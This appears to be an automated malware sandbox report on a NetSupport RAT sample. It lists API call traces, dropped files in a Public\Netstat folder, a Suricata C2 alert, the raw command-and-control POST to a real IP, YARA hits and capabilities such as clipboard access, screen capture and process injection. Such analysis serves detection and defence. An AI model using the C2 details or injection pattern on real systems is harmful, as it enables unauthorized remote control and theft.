Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BFCA0 FindFirstFileExA,	0_2_00007FF70E7BFCA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	6_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_1110AFD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	9_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	9_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	9_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	9_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	9_2_1110AFD0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.6:49708 -> 45.61.128.74:443

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 104.26.0.231 104.26.0.231

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST http://45.61.128.74/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.61.128.74Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

Source: file.exe, 00000000.00000003.2145215251.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2146640720.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144886227.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/fakeurl.htm
Source: file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htm
Source: file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspU
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspc
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspi
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: remcmdstub.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

6_2_1101F6B0

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	6_2_1101F6B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,	6_2_11032EE0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	9_2_1101F6B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,	9_2_11032EE0

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,

6_2_110321E0

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,

6_2_110076F0

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		6_2_11113880
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		9_2_11113880

Source: Yara match	File source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.229e94ad820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 1936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 4000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		6_2_111158B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		9_2_111158B0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E78C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF70E78C2F0

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

6_2_1115DB40

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		6_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		9_2_1102D330

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A1F20	0_2_00007FF70E7A1F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E785E24	0_2_00007FF70E785E24
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7ACE88	0_2_00007FF70E7ACE88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E78F930	0_2_00007FF70E78F930
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E794928	0_2_00007FF70E794928
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B0754	0_2_00007FF70E7B0754
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79A4AC	0_2_00007FF70E79A4AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A3484	0_2_00007FF70E7A3484
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7AB190	0_2_00007FF70E7AB190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79AF18	0_2_00007FF70E79AF18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C2080	0_2_00007FF70E7C2080
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B0754	0_2_00007FF70E7B0754
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A8DF4	0_2_00007FF70E7A8DF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A2D58	0_2_00007FF70E7A2D58
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A4B98	0_2_00007FF70E7A4B98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E795B60	0_2_00007FF70E795B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79BB90	0_2_00007FF70E79BB90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B8C1C	0_2_00007FF70E7B8C1C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B89A0	0_2_00007FF70E7B89A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A3964	0_2_00007FF70E7A3964
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79C96C	0_2_00007FF70E79C96C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E781AA4	0_2_00007FF70E781AA4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A2AB0	0_2_00007FF70E7A2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C5AF8	0_2_00007FF70E7C5AF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E791A48	0_2_00007FF70E791A48
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BFA94	0_2_00007FF70E7BFA94
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BC838	0_2_00007FF70E7BC838
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E784840	0_2_00007FF70E784840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79B534	0_2_00007FF70E79B534
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C2550	0_2_00007FF70E7C2550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7876C0	0_2_00007FF70E7876C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A53F0	0_2_00007FF70E7A53F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A21D0	0_2_00007FF70E7A21D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79F180	0_2_00007FF70E79F180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E78C2F0	0_2_00007FF70E78C2F0
